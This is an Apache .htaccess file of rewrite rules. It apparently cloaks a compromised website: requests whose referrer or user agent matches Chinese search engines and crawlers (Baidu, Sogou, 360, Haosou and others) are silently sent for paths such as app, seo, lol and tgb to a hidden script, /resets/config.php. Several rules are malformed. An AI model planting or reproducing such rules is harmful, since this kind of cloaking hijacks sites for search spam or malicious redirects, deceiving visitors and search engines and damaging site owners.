RewriteEngine on

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^app(.*)$ /resets/config.php?app$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^app(.*)$ /resets/config.php?$1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^wsp(.*)$ /resets/config.php?wsp$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^wsp(.*)$ /resets/config.php?wsp$1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^ssp(.*)$ /resets/config.php?ssp$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^ssp(.*)$ /resets/config.php?ssp$1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^seo(.*)$ /resets/config.php?seo$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^seo(.*)$ /resets/config.php?seo$1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^tab(.*)$ /resets/config.php?tab$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^tab(.*)$ /resets/config.php?tab$1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^all(.*)$ /resets/config.php?all$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^all(.*)$ /resets/config.php?$all1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^lpl(.*)$ /resets/config.php?lpl$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^lpl(.*)$ /resets/config.php?lpl$1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^lol(.*)$ /resets/config.php?lol$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^lol(.*)$ /resets/config.php?lol$1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^nes(.*)$ /resets/config.php?nes$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^nes(.*)$ /resets/config.php?$nes1 [QSA,NC,L]

RewriteCond %{HTTP_REFERER} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^tgb(.*)$ /resets/config.php?tgb$1 [QSA,NC,L] 
RewriteCond %{HTTP:User-Agent} (baidu|so|sogou|360|sm|UCBrowser|haosou|YisouSpider) [NC]  
RewriteRule ^tgb(.*)$ /resets/config.php?$tgb1 [QSA,NC,L]